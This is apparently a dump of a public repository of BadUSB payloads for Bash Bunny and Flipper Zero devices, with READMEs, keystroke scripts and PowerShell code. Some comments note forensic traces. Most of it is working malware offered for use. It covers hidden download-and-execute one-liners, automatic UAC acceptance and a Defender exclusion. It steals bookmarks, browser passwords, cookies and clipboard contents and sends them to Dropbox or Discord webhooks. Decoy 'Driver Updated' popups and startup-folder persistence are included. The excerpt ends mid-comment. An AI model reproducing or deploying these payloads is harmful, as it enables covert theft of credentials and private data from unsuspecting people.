</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Spotify-Spy/SS.ps1
================================================
#Spotify-Spy
# Purpose: writes a directory listing of %APPDATA%\Spotify\Users to a text
# file, copies that file to the temp directory, uploads it to Dropbox and then
# shows a short "Driver Updated" popup.
# Review note (defensive): traces are the listing file copied into the temp
# directory (only the copy inside Spotify\Users is removed below), a POST from
# powershell.exe to content.dropboxapi.com, and the access token embedded in
# the script.
# See if file is a thing
# The result of this Test-Path is only written to output; nothing branches on it.
Test-Path -Path "$env:APPDATA\Spotify\Users"
#Create varible for file name
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_spotify_users.txt"
# Gets the name of the spotify user
# The listing is the set of entries under Spotify\Users, redirected into $F1 in that same directory.
cd "$env:APPDATA\Spotify\Users"
Get-ChildItem > $F1
# Copy Spotify User to Temp Directory to get sent to Dropbox
Copy-Item "$F1" -Destination "$env:tmp/$F1"
# DropBox-Upload: uploads one local file to the root of a Dropbox account.
#   -SourceFilePath / -f  (mandatory, accepts pipeline input) path of the file to send.
# The remote name is the leaf of the local path; the request is a POST to
# content.dropboxapi.com/2/files/upload authorised by the bearer token below.
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# JSON argument for the upload endpoint, passed in the Dropbox-API-Arg header.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
# Relative path: removes the listing from the current directory (Spotify\Users).
rm $F1
# Popup with a one-second timeout; the text is unrelated to what the script did.
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: BashBunny/payloads/Spotify-Spy/payload.txt
================================================
REM Title: Spotify-Spy
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
REM Target: Windows 10
REM Review note: the keystrokes open the Run dialog (GUI r) and type a single
REM PowerShell command that fetches a remote script with iwr and hands the
REM response to iex, so this line itself writes no script file to disk.
REM Defensive view: the typed command stays in the user's RunMRU registry key,
REM and PowerShell script block logging (event 4104), where enabled, records
REM the script that iex ran.
Q DELAY 2000
Q GUI r
Q DELAY 500
Q STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
Q ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/Water-UnMark/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Water-UnMark
A payload to get rid of the ugly windows activation watermark.
## Description
This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
## Getting Started
### Dependencies
* Unactivated Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Water-UnMark/payload.txt
================================================
REM Title: Water-UnMark
REM Author: atomiczsec
REM Target OS: Windows 10
REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
REM Review note: the sequence starts an elevated PowerShell (-verb runAs),
REM answers the elevation prompt with ALT Y, sets Start = 4 on the svsvc
REM service key (4 is the "disabled" start type) and forces a reboot.
REM Restart-Computer -Force does not wait for open applications, so unsaved
REM work in the session is lost.
REM Defensive view: ALT Y only works when the prompt is a consent prompt for a
REM logged-in administrator. Standard-user sessions, or UAC configured to ask
REM for credentials, leave the keystroke with nothing to accept. To revert,
REM restore the previous Start value on the same key.
DELAY 2000
GUI r
DELAY 100
STRING powershell Start-Process powershell -verb runAs
DELAY 1000
ALT Y
DELAY 1000
STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
ENTER
DELAY 100
STRING Restart-Computer -Force
ENTER
================================================
FILE: BashBunny/payloads/Water-UnMark/placeholder
================================================
================================================
FILE: BashBunny/payloads/cApS-Troll/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;cApS+Troll+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# cApS-Troll
This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
## Description
This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Define the `DEFINE TARGET_URL example.com`
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/cApS-Troll/a.ps1
================================================
# Purpose: toggles Caps Lock by sending the {CAPSLOCK} key through
# WScript.Shell.SendKeys, five times per pass (after 45 s, then every 15 s).
# The loop has no exit condition: it runs until the hosting powershell.exe is
# ended. It writes no files and makes no network requests.
# Review note (helpdesk): ending the hidden powershell.exe process stops it;
# nothing in this script re-launches it.
while (1){
Start-Sleep -Second 45
# A new WScript.Shell COM object is created before every key press.
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
Start-Sleep -Second 15
$wsh = New-Object -ComObject WScript.Shell
$wsh.SendKeys('{CAPSLOCK}')
}
================================================
FILE: BashBunny/payloads/cApS-Troll/payload.txt
================================================
REM Title: cApS-Troll
REM Author: atomiczsec
REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
REM Target: Windows 10
REM Review note: the keystrokes open the Run dialog (GUI r) and type a single
REM PowerShell command that fetches a remote script with iwr and hands the
REM response to iex, so this line itself writes no script file to disk.
REM Defensive view: the typed command stays in the user's RunMRU registry key,
REM and PowerShell script block logging (event 4104), where enabled, records
REM the script that iex ran.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/placeholder
================================================
================================================
FILE: FlipperZero/payloads/Bookmark-Hog/BH.ps1
================================================
#Bookmark-Hog
# Purpose: copies the Default-profile Bookmarks file of Chrome and of Edge into
# the temp directory under user- and time-stamped names, uploads both copies
# to Dropbox and shows a short "Driver Updated" popup.
# Review note (defensive): only the Default profile of each browser is read.
# Traces are the two *_bookmarks.txt copies in the temp directory (this script
# does not delete them), POSTs from powershell.exe to content.dropboxapi.com,
# and the access token embedded in the script.
# See if file is a thing
# The result of this Test-Path is only written to output; the branch below tests again.
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The chrome bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Chrome bookmarks to the temp directory
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1"
}
# See if file is a thing
# As above, this result is only written to output.
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
try {
Write-Host "The edge bookmark file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Copy Edge bookmarks to the temp directory
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2"
}
# DropBox-Upload: uploads one local file to the root of a Dropbox account.
#   -SourceFilePath / -f  (mandatory, accepts pipeline input) path of the file to send.
# The remote name is the leaf of the local path; the request is a POST to
# content.dropboxapi.com/2/files/upload authorised by the bearer token below.
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# JSON argument for the upload endpoint, passed in the Dropbox-API-Arg header.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
# Popup with a one-second timeout; the text is unrelated to what the script did.
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: FlipperZero/payloads/Bookmark-Hog/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/bm-hog.png?" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Bookmark+Hog!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Bookmark-Hog
A payload to exfiltrate bookmarks of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the bookmark history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Bookmark-Hog/payload.txt
================================================
REM Title: Bookmark-Hog
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate bookmarks to the FlipperZero
REM Target: Windows 10, 11
REM Review note: the keystrokes open the Run dialog (GUI r) and type a single
REM PowerShell command that fetches a remote script with iwr and hands the
REM response to iex, so this line itself writes no script file to disk.
REM Defensive view: the typed command stays in the user's RunMRU registry key,
REM and PowerShell script block logging (event 4104), where enabled, records
REM the script that iex ran.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
================================================
FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Browser+Devil!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Browser-Devil
A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
## Description
This payload will exclude the C: drive on the device so Windows Defender doesn't flag the exe
This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
Finally, dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Admin privileges on the device you are targeting
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Exe Author](https://github.com/moonD4rk/HackBrowserData)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/b.ps1
================================================
function Upload-Discord {
<#
.SYNOPSIS
Sends a text message and/or a file to the webhook URL held in $hookurl.
.PARAMETER file
Optional path of a file to upload. When non-empty it is handed to curl.exe as the
multipart form field "file1".
.PARAMETER text
Optional message text. When non-empty it is posted as the 'content' field of a JSON body,
with 'username' set to the logged-on user's name ($env:username).
.NOTES
Two separate outbound web requests can result: one made by PowerShell itself
(Invoke-RestMethod) and one by a curl.exe child process. Proxy/egress logs for webhook
endpoints and process-creation logs showing curl.exe spawned by powershell.exe are where
this activity is visible.
#>
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
# Destination webhook; a placeholder in the published script.
$hookurl = 'YOUR-DISCORD-WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $text
}
# Text message: only sent when $text is non-empty.
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
# File upload: only attempted when $file is non-empty.
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
# Adds the user's temp directory ($env:tmp) to Microsoft Defender's exclusion paths, so
# files written there are not scanned. Add-MpPreference needs an elevated session, and
# Defender records the configuration change (event ID 5007 in the
# Microsoft-Windows-Windows Defender/Operational log); a new exclusion on a temp path is
# a strong alert condition on its own.
Add-MpPreference -ExclusionPath $env:tmp
# Downloads browser.exe from the repository's Assets folder into the temp directory.
# NOTE(review): the accompanying README credits moonD4rk/HackBrowserData as the exe's
# author, so this is presumably a build of that tool - not verifiable from this script.
iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe"
# Runs the downloaded exe from the temp directory with a hidden window and waits for it to exit.
cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait
# Compresses the "results" directory under temp (presumably the exe's output - not shown
# here) into browserdata.zip and uploads the archive through Upload-Discord.
Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip
Upload-Discord -file "$env:tmp\browserdata.zip"
================================================
FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/payload.txt
================================================
REM Title: Browser-Devil
REM Author: atomiczsec
REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers
REM Target: Windows 10
REM Keystroke sequence: wait for the HID device to enumerate, then open the Run dialog (Win+R).
DELAY 2000
GUI r
DELAY 1000
REM Starts PowerShell, which relaunches itself elevated (saps = Start-Process, -verb runas).
STRING powershell saps powershell -verb runas
ENTER
DELAY 1000
REM ALT y answers "Yes" on the UAC consent prompt. The keystroke only elevates when the
REM logged-on user is a local administrator and UAC asks for consent rather than credentials;
REM a standard-user session or a credential prompt stops the sequence at this point.
ALT y
DELAY 1000
REM Typed into the elevated window: the downloaded content is piped to Invoke-Expression, so
REM this step does not write the script to disk. PowerShell script block logging (event ID 4104)
REM still records the executed script text.
STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
================================================
FILE: FlipperZero/payloads/Copy-And-Waste/I.bat
================================================
@echo off
REM Launcher for c.ps1: changes to the user's AppData\Roaming folder and runs c.ps1 in a
REM nested PowerShell with a hidden window (-w h), no profile (-NoP), non-interactive mode
REM (-NonI) and the execution policy bypassed (-Ep Bypass).
REM The payload's README describes this file as being placed in the Startup folder so that
REM c.ps1 runs again at logon; a batch file in a user's Startup folder that starts hidden
REM PowerShell is a persistence artifact to look for.
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause
================================================
FILE: FlipperZero/payloads/Copy-And-Waste/README.md
================================================
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈¢er=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Copy-And-Waste
A payload to exfiltrate clipboard contents
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup
**c.ps1** will sit in the AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X keypress
The clipboard contents will then be sent to the Discord webhook for viewing pleasure
For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: FlipperZero/payloads/Copy-And-Waste/c.ps1
================================================
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
function dischat {
<#
.SYNOPSIS
Posts a string to the webhook URL held in $hookUrl.
.PARAMETER con
Mandatory text to send. It becomes the 'content' field of the request body, alongside
'username' set to the logged-on user's name ($env:username).
.NOTES
Every call is one outbound POST made by the PowerShell process itself, so repeated small
POSTs from powershell.exe to a webhook endpoint are the network-side trace of this function.
#>
[CmdletBinding()]
param (
[Parameter (Position=0,Mandatory = $True)]
[string]$con
)
# Destination webhook; a placeholder in the published script.
$hookUrl = 'YOUR DISCORD WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $con
}
# The hashtable is passed as the request body as-is (no explicit content type is set here).
Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
}
# Sends whatever is on the clipboard once at start-up, before any key is pressed.
dischat (get-clipboard)
# Endless polling loop: each pass reads the current state of both Ctrl keys and of C and X
# through the WPF Keyboard class (hence the WindowsBase/PresentationCore assemblies loaded
